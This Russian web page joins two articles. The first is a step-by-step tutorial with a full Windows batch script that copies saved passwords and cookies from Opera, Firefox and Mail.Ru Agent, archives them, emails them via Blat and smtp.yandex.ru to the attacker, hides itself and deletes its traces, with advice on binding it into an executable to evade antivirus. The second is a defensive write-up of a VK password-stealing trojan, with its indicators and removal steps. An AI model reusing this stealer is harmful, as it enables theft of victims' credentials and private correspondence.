Пример Простого Bat Вируса,ворующего Файлы С Паролями.
В этой статье опишу как можно быстро и без особого труда,написать и сделать вирус ворующий файлы с паролями и отправляющий всё это на почтовый ящик. Начнём с того что вирус будет написан на bat'e(CMD,основные команды Вы можете взять здесь) то есть в обычном текстовом файле и будет выполняться при помощи стандартного,встроенного интреператора Windows- «командной строки». Для того чтоб написать подобный вирус,нужно знать точное место хранения тех файлов которые и будет он воровать, компоненты Blat которые можно скачать с офф сайта http://www.blat.net/ или же с нашего сервера,так же компонент от архиватора WinRaR Rar.exe(можно обойтись и без него). Открываем блокнот и копируем туда следующий код:
Код:@echo off md %systemroot%wincs md %SystemDrive%pass md %SystemDrive%passopera md %SystemDrive%passMozilla md %SystemDrive%passMailAgent md %SystemDrive%passMailAgentreg attrib %systemroot%wincs +h +s +r attrib %SystemDrive%pass +h +s +r copy /y "%systemroot%blat.exe" "%systemroot%wincsblat.exe" copy /y "%systemroot%blat.dll" "%systemroot%wincsblat.dll" copy /y "%systemroot%blat.lib" "%systemroot%wincsblat.lib" CD /D %APPDATA%OperaOpera copy /y wand.dat %SystemDrive%passoperawand.dat copy /y cookies4.dat %SystemDrive%passoperacookies4.da regedit.exe -ea %SystemDrive%passMailAgentregagent.reg "HKEY_CURRENT_USERsoftwareMail.RuAgentmagent_logins2 regedit.exe -ea %SystemDrive%passMailAgentregagent_3.reg "HKEY_CURRENT_USERsoftwareMail.RuAgentmagent_logins3 CD /D %APPDATA% Xcopy MraBase %SystemDrive%passMailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy MraUpdatever.txt %SystemDrive%passMailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%MozillaFirefoxProfiles*.default copy /y cookies.sqlite %SystemDrive%passMozillacookies.sqlite copy /y key3.db %SystemDrive%passMozillakey3.db copy /y signons.sqlite %SystemDrive%passMozillasignons.sqlite copy /y %Windir%Rar.exe %SystemDrive%passRar.exe >nul del /s /q %SystemRoot%Rar.exe %SystemDrive%passrar.exe a -r %SystemDrive%passpass.rar %SystemDrive%pass copy /y %SystemDrive%passpass.rar %systemroot%wincspass.rar cd %systemroot%wincs %systemroot%wincsblat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль ren *.rar pass.rar %systemroot%wincsblat.exe -body FilesPassword -to логин@yandex.ru -attach %systemroot%wincspass.rar rmdir /s /q %SystemDrive%pass rmdir /s /q %systemroot%wincs del /s /q %systemroot%blat.exe del /s /q %systemroot%blat.dll del /s /q %systemroot%blat.lib attrib +a +s +h +r %systemroot%wind.exe EXIT clsНе много распишу код самого батинка.@echo off
— скрывает тело батинка( так то она и не нужна,ну всё же)md %systemroot%wincs
— создаёт папку wincs
в системной папке Windows не зависимо от того на каком диске она установлена или как она названа.md %SystemDrive%pass
— создаёт папку pass
на диске куда установлена система Windows.md %SystemDrive%passopera
— создаёт папку opera
куда в дальнейшем будет копироваться wand.dat
и cookies4.dat
от браузера Opera (до 11* версий опера хранит свои пароли в файле wand.dat
)md %SystemDrive%passMozilla
— создаёт папку Mozilla
куда в дальнейшем будут копироваться файлы от браузера Mozilla (cookies.sqlite
,key3.db
,signons.sqlite
) в которых храняться пароли.md %SystemDrive%passMailAgent
— создаёт папку MailAgent
в которую будут копироваться файлы содержащие в себе историю переписки и ключи реестра( хранящие в себе пароли) от Маил Агента.md %SystemDrive%passMailAgentreg
— создаёт папку reg
attrib %systemroot%wincs +h +s +r
— ставит атрибуты на папку wincs
тем самым скрывая её от глаз.attrib %SystemDrive%pass +h +s +r
— тоже самое что и выше.copy /y «%systemroot%blat.exe» «%systemroot%wincsblat.exe»
— копирует файл blat.exe
с места выгрузки в папку wincs
copy /y «%systemroot%blat.dll» «%systemroot%wincsblat.dll»
— копирует файл blat.dll
с места выгрузки в папку wincs
copy /y «%systemroot%blat.lib» «%systemroot%wincsblat.lib»
— копирует файл blat.lib
с места выгрузки в папку wincs
CD /D %APPDATA%OperaOpera
— переходит в папку оперы где располагаются файлы с паролями ( и не только) от оперы.copy /y wand.dat %SystemDrive%passoperawand.dat
— копирует файл wand.dat
в папку opera
copy /y cookies4.dat %SystemDrive%passoperacookies4.dat
— копирует файл cookies4.dat
в папку opera
regedit.exe -ea %SystemDrive%passMailAgentregagent.reg «HKEY_CURRENT_USERsoftwareMail.RuAgentmagent_logins2
— экспортирует ключ реестра magent_logins2
где хранится пароль, в папку reg
regedit.exe -ea %SystemDrive%passMailAgentregagent.reg «HKEY_CURRENT_USERsoftwareMail.RuAgentmagent_logins3
— экспортирует ключ реестра magent_logins3
где хранится пароль, в папку reg
CD /D %APPDATA%
— переходим в папку AppData
Xcopy MraBase %SystemDrive%passMailAgent /K /H /G /Q /R /S /Y /E >nul
— копирует содержимое папки MraBase
в папку MailAgent
Xcopy MraUpdatever.txt %SystemDrive%passMailAgent /K /H /G /Q /R /S /Y >nul
— копирует файл ver.txt
в папку MailAgent
cd %AppData%MozillaFirefoxProfiles*.default
— переходим в папку с профилем браузера Мозилыcopy /y cookies.sqlite %SystemDrive%passMozillacookies.sqlite
— копирует файл cookies.sqlite
в папку Mozilla
copy /y key3.db %SystemDrive%passMozillakey3.db
— копирует файл key3.db
в папку Mozilla
copy /y signons.sqlite %SystemDrive%passMozillasignons.sqlite
— копирует файл signons.sqlite
в папку Mozilla
copy /y %Windir%Rar.exe %SystemDrive%passRar.exe >nul
— копирует компонент архиватора WinRar Rar.exe
в папку pass
del /s /q %SystemRoot%Rar.exe
— удаляет компонент архиватора из папки Windows%SystemDrive%passrar.exe a -r %SystemDrive%passpass.rar %SystemDrive%pass
— архивируем содержимое папки pass
copy /y %SystemDrive%passpass.rar %systemroot%wincspass.rar
копируем созданный архив в папку wincs
cd %systemroot%wincs
— переходим в папку wincs
%systemroot%wincsblat.exe -install -server smtp.yandex.ru -port 587 -f
логин@yandex.ru
-u
логин
-pw
Пароль
— готовит программу Blat к отправки архив указывая данные для авторизации и отправки письма.Не забудьте указать свои данные от почтового ящика,от куда будет отправляться письмо с архивом.ren *.rar pass.rar
— на всякий случай если архив в ходе не принял не правильное имя,мы его ещё раз переименуем в pass.rar
%systemroot%wincsblat.exe -body Files Password -to
логин@yandex.ru
-attach %systemroot%wincspass.rar
— указываем на какой почтовый адрес будет послано письмо и отсылаем его.rmdir /s /q %SystemDrive%pass
— удаляем папку pass
rmdir /s /q %systemroot%wincs
— удаляем папку wincs
del /s /q %systemroot%blat.exe
— удаляем компоненты Blat из папки Windows.del /s /q %systemroot%blat.dll
— удаляем компоненты Blat из папки Windows.del /s /q %systemroot%blat.lib
— удаляем компоненты Blat из папки Windows.attrib +a +s +h +r %systemroot%wind.exe
— ставим на себя атрибуты тем самым скрываем себя от глаз.EXIT
— завершаем процесс батинка и выходим.cls
— очищаем вывод каких либо строк в интреператоре. Скопировали,сохраняем как wind.bat и компилируем в exe при помощи программы Bat to exe converter
,далее собираем всё в кучу,то есть берём компоненты программы Blat и компонент архиватора WinRar (скачать можно здесь) и склеиваем в один исполняемый файл,или же с какой нибудь программой, путь выгрузки всех фалов должен быть %SystemRoot%
или %WindowsDir%
или %windir%
. В итоге мы получаем вирус который не будет палиться антивирусами и будет отправлять архив с файлами к Вам на почту.Файлы которые придут на почту,можно расшифровать с помощью multi-password-recovery ,правда не все,а только wand.dat от оперы и то если её не обновляли до 11*версий.Все остальные файлы можно расшифровать заменив на свои. На этом я думаю можно закончить,если же у Вас возникнут какие либо вопросы,не стесняйтесь задавайте. Спасибо за внимание,всего доброго! ©SwAp TheHackWorld.in
Троян ворующий пароли «В Контакте» и «Одноклассники» (Trojan.Win32.Sasfis.tzv / Trojan.Siggen.18292) :: Записки молодого админа
Троянская программа mvk.exe не попадает на компьютер без ведома пользователя, как это бывает с другими. Пользователь сам скачивает и запускает его т.к. думает, что это другая программа (для взлома контакта). Простенькая социальная инженерия 🙂Что творит в системе или деструктивная активность
После запуска файла mvk.exe он удаляется, после чего появляется окно, в котором предложено ввести ID юзера «В Контакте». Если ввести любой ID и нажать кнопку, то появляется сообщение, что не возможно получить данные, т.к. уязвимость контакта уже закрыли. Т.ж. троян создает 3 файла во временной папке пользователя (%TMP%), один ярлык в папке автозагрузки, который запускает файл из %WinDir% (этот файл тоже трой делает) и 1 файл в %System%. Т.е. получается 6 файлов. В добавок трой изменяет ключ запуска проводника в реестре. И файл hosts. А теперь конкретнее… Файлы: %WinDir%activate.exe %System%loio.jho %TMP%2.tmp %TMP%3.tmp %TMP%4.tmp %StartDir%Quick Office.lnk И реестр: Ветка — HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon, параметр — Shell, его значение — Explorer.exe rundll32.exe loio.jho soalsv. А должно быть просто — Explorer.exe.Как лечить
Загрузиться в безопасном режиме (жать F8 после включения компа). Открыть диспетчер задач (Ctrl+Alt+Del или Ctrl+Shift+Esc) и «убить» процесс «activate.exe», если таковой имеется. Потом удалить файлы C:Windowsactivate.exe и C:WindowsSystem32loio.jho, удалить ярлык из папки Автозагрузка (Пуск -> Программы -> Автозагрузка) и удалить все файлы из временной папки пользователя (обычно C:Documents and SettingsИМЯ_ПОЛЬЗОВАТЕЛЯLocal SettingsTemp). Открыть редактор реестра (Пуск -> Выполнить…, ввести regedit и нажать ОК), перейти в ветку HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon, найти параметр Shell, дважды щелкнуть по нему мышкой и заменить его значение на «Explorer.exe» (без кавычек). Т.ж. нужно перейти в папку C:WindowsSystem32Driversetc, открыть файл hosts в блокноте и удалить из него все строки за исключением «127.0.0.1 localhost». Вы так же можете скачать мою программку для удаления этого вируса — anti_mvk.exe. После запуска anti_mvk.exe и нажатия кнопку «Лечить» исчезнет рабочий стол, а потом компьютер будет перезагружен, поэтому предварительно лучше закрыть все открытые программы для предотвращения утери не сохраненной информации. ВАЖНО!!! Утила не сообщает есть ли троян или нет, а тупо пытается вычистить все, что может указывать на наличие трояна в системе, поэтому перезагрузка произдойдет не зависимо от того, есть ли троян или нет.
Краткая техническая информация для IT’шников
В этом разделе кратко опишу как я его анализировал. Может кому будет интересно. Размер файла 19456 байт. MD5-хэш — d5dbd34b12eb653d07ec17287fd3f26c. Судя по всему, написан на Delphi и упакован UPX’ом. Как уже говорил, спам был в виде граффити на моей стенке в контакте, там была нарисована «ссылка» на vk-****.msk.ru. Если зайти на этот адрес, то происходил редирект на http://vk****-****.blogspot.com/ и уже в этом блоге предлагают скачать этот самый троян, под видом программы для взлома аккаунтов контакта и «включить защиту от взлома своей анкеты» (от последнего чуть под стол не свалился). В анализе участвовали след. утилиты:Autoruns — Позволяет определить, какие приложения запускаются автоматически при загрузке системы и выполнении входа в систему. Также показывает полный перечень путей в реестре и на диске, где может быть настроен автоматический запуск приложений.Process Explorer — Отображает файлы, разделы реестра, библиотеки DLL и прочие объекты, открытые или загруженные различными процессами, а также другую информацию, включая владельца процесса.AVZ4 — Очень хорошая утилита, помогающая исследовать систему (ВАЖНО!!! В кривых руках может загубить систему!!!).VirtualBox — виртуальная машина, на ней я исследовал (запускал) вирус. Для начала запустил Autoruns, подождал пока он отработает и сохранил список. Потом перешел к AVZ4. В нем задействовал функции «Исследование системы», «Резервное копирование» и «Ревизор». После чего запустил Process Explorer, чтобы можно было видеть какие дополнительные (под)процессы запускает троян. Положил на рабочий стол и запустил файл трояна, Process Explorer тут же был закрыт, поэтому я не смог увидеть то, что хотел. Файл трояна с рабочего стола исчез (удалился). Через пару секунд появилось окно трояна, о котором говорилось во втором разделе поста. Снова запустил Process Explorer и увидел от моего имени запущенные процессы svchost.exe и 4.tmp. Первый — родной процесс (файл) винды и запущен был из %System%. Зачем его запустил троян, не знаю, не разбирался. Второй это компонент трояна. Закрыл окно трояна. Снова запустил Autoruns и AVZ4 и повторил те действия, которые делал до запуска трояна. После чего перезагрузился в безопасный режим и снова повторил эти действия. Далее скинул полученные файлы-отчеты себе на хоста машину (Linux Ubuntu 9.10 Desktop) и уже на ней произвел анализ этих логов (отчетов). На основе анализа логов, т.е. их сравнении, выяснилось то, что было описано во втором разделе данного поста. Компоненты трояна анализировать не стал. Вот скрины с сайта VirusTotal, на которых видно, как и какие антивири идентифицируют троян и его компоненты (NOD32 меня просто убил своей реакцией на ярлык
о_О )
на данный момент, если кому интересно:
Далее была написана не большая «антивирусная» утилита anti_mvk.exe, на AutoIT. Забрать можно тут — бинарники и исходники. Информация с сайта http://angel2s2.blogspot.com/. Если Вы читаете информацию на другом сайте, пожалуйста свяжитесь с автором сайта http://angel2s2.blogspot.com/.
Загрузка...
![Стиллер паролей с отправкой на почту [RePack by N1GGA]](https://proctoline.ru/wp-content/cache/thumb/14/95e519ac7bf4e14_150x95.jpg)